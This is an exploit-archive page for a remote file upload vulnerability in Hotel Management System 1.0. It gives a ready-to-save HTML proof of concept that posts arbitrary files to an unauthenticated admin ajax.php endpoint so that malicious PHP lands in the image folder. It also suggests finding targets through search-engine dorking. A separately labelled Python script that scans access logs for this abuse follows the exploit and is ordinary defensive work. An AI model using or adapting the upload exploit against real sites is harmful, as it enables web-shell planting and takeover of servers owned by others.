## https://sploitus.com/exploit?id=PACKETSTORM:180099
=============================================================================================================================================  
| # Title : Hotel Management System 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] This HTML page is designed to remotely upload malicious PHP files directly.  
  
[+] Line 23 set url of target.  
  
[+] The path to upload the files : http://127.0.0.1/hotel/assets/img/  
  
[+] Save Code as html :  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Category Management</title>  
</head>  
<body>  
<div class="container-fluid">  
<form id="manage-category" enctype="multipart/form-data">  
<input type="hidden" name="id">   
<div class="form-group">  
<label for="img" class="control-label">Ev!L Image</label>  
<input type="file" name="img" id="img" class="form-control form-control-sm rounded-0" accept="image/*" onchange="displayImg(this, $(this))">  
</div>  
<button type="submit" class="btn btn-primary">Send</button>  
</form>  
</div>  
  
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
<script>  
function displayImg(input, _this) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
$('#cimg').attr('src', e.target.result);  
}  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
$('#manage-category').submit(function(e){  
e.preventDefault();  
$.ajax({  
url: 'http://127.0.0.1/hotel/admin/ajax.php?action=save_category',  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
success: function(resp){  
if (resp == 1) {  
alert("Data successfully added");  
setTimeout(function(){  
location.reload();  
}, 1500);  
  
}  
}  
});  
});  
  
$('.edit_cat').click(function(){  
var cat = $('#manage-category');  
cat.get(0).reset();  
$('#cimg').attr('src', '../assets/img/' + $(this).attr('data-cover_img'));  
});  
  
</script>  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================
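
A defender-side check for the issue described above, as an added example that is not part of the original advisory: it scans web-server access logs for POSTs to the `save_category` action and for requests to script-type files under the upload directory. The combined log format, the `/hotel` prefix (the PoC's local install path) and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and upload directory come from the advisory; the "/hotel" prefix is
# the PoC's local install path and will differ per deployment (assumption).
UPLOAD_ENDPOINT = "/hotel/admin/ajax.php"
UPLOAD_ACTION = "save_category"
UPLOAD_DIR = "/hotel/assets/img/"
# Extensions commonly mapped to the PHP handler, including "name.php.jpg" forms.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)

# Apache/nginx "combined" log format (assumed): ip, timestamp, request, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_upload_abuse(lines):
    """Return (kind, ip, timestamp, status, target) tuples worth reviewing."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        action = parse_qs(url.query).get("action", [""])[0]
        hit = None
        if m["method"] == "POST" and url.path == UPLOAD_ENDPOINT and action == UPLOAD_ACTION:
            # Legitimate admins use this action too; recorded for correlation.
            uploaders.add(m["ip"])
            hit = "category-upload"
        elif url.path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(url.path):
            # A script extension never belongs in an image directory.
            hit = "script-after-upload" if m["ip"] in uploaders else "script-in-upload-dir"
        if hit:
            findings.append((hit, m["ip"], m["ts"], m["status"], m["target"]))
    return findings

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2024:10:00:01 +0000] "POST /hotel/admin/ajax.php?action=save_category HTTP/1.1" 200 1',
    '203.0.113.7 - - [01/Aug/2024:10:00:05 +0000] "GET /hotel/assets/img/sample.php HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Aug/2024:10:01:00 +0000] "GET /hotel/assets/img/room1.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [01/Aug/2024:10:02:00 +0000] "GET /hotel/assets/img/logo.PHP5 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A `script-after-upload` hit with status 200 is the strongest signal; pair it with a listing of the upload directory to confirm what is actually on disk.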